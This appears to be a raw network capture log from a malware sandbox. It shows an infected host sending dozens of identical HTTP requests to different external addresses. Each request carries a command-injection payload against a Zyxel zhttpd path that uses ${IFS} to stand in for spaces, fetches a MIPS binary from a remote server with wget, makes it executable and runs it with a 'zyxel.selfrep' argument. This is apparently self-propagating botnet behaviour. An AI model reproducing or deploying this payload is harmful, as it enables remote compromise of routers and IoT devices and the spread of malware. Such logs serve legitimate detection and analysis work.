                                    Jan 13, 2024 19:02:39.289832115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5558192.168.2.1354714206.241.151.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.289866924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5559192.168.2.133846449.130.151.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.289931059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5560192.168.2.1358490142.11.253.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.289988995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5561192.168.2.1336330138.217.27.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.290044069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5562192.168.2.135168672.181.16.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.290108919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5563192.168.2.1338720122.253.48.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.290152073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5564192.168.2.1342020192.23.113.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.290196896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5565192.168.2.135262064.44.8.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.290256977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5566192.168.2.1338704146.190.83.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.290323019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5567192.168.2.1343996110.6.83.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.290359974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5568192.168.2.134004036.93.40.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.290421009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5569192.168.2.133550088.223.132.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.290447950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5570192.168.2.135181663.220.228.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.290504932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5571192.168.2.1360014104.189.207.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.290555000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5572192.168.2.1333762122.113.177.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.290616035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5573192.168.2.1339806176.148.113.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.290666103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5574192.168.2.1341174222.205.14.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.290714979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5575192.168.2.1347720167.14.12.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.290782928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5576192.168.2.1351048183.54.101.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.290826082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5577192.168.2.1355102171.164.153.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.290888071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5578192.168.2.134223042.119.145.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.290936947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5579192.168.2.1342480177.137.46.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.290996075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5580192.168.2.133462237.144.129.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.291055918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5581192.168.2.13594289.46.220.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.291141033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5582192.168.2.1345510117.1.94.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.291196108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5583192.168.2.1346040104.185.190.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.291234016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5584192.168.2.1341480179.93.147.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.291295052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5585192.168.2.135172281.239.83.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.291320086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5586192.168.2.1354634136.100.142.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.291364908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5587192.168.2.1356210208.157.128.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.291438103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5588192.168.2.1335324180.9.196.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.291477919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5589192.168.2.135051450.95.47.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.291527033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5590192.168.2.135412858.159.0.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.291594982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5591192.168.2.1337934111.5.75.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.291647911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5592192.168.2.1350448189.123.53.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.291692019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5593192.168.2.135057667.144.67.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.291704893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5594192.168.2.1335618164.18.77.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.291774035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5595192.168.2.1335266116.214.92.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.291838884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5596192.168.2.1336786151.127.217.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.291925907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5597192.168.2.133698871.145.161.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.291985035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5598192.168.2.1348026171.89.22.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.292033911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5599192.168.2.134278619.36.178.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.292068958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5600192.168.2.1341268141.135.80.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.292129040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5601192.168.2.1352822113.44.220.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.292188883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5602192.168.2.1357672150.141.75.62443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.292222977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5603192.168.2.1355724140.131.163.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.292299986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5604192.168.2.133451475.182.93.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.292336941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5605192.168.2.1358566168.203.214.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.292402029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5606192.168.2.1348768117.61.211.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.292423010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5607192.168.2.1335010203.62.65.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.292469978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5608192.168.2.1347138136.217.61.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.292519093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5609192.168.2.1335326103.110.19.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.292620897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5610192.168.2.1347658166.1.183.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.292706013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5611192.168.2.1340848132.0.42.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.292751074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5612192.168.2.1344696147.92.75.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.292824984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5613192.168.2.1337592170.34.153.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.292836905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5614192.168.2.133356283.209.155.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.292836905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5615192.168.2.133848446.88.250.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.292860985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5616192.168.2.135795868.108.69.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.292922974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5617192.168.2.1357710132.109.81.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.292953968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5618192.168.2.134205261.206.147.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.293066025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5619192.168.2.1342482132.35.195.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.293086052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5620192.168.2.1348638114.98.237.1443
                                    TimestampBytes transferredDirectionData
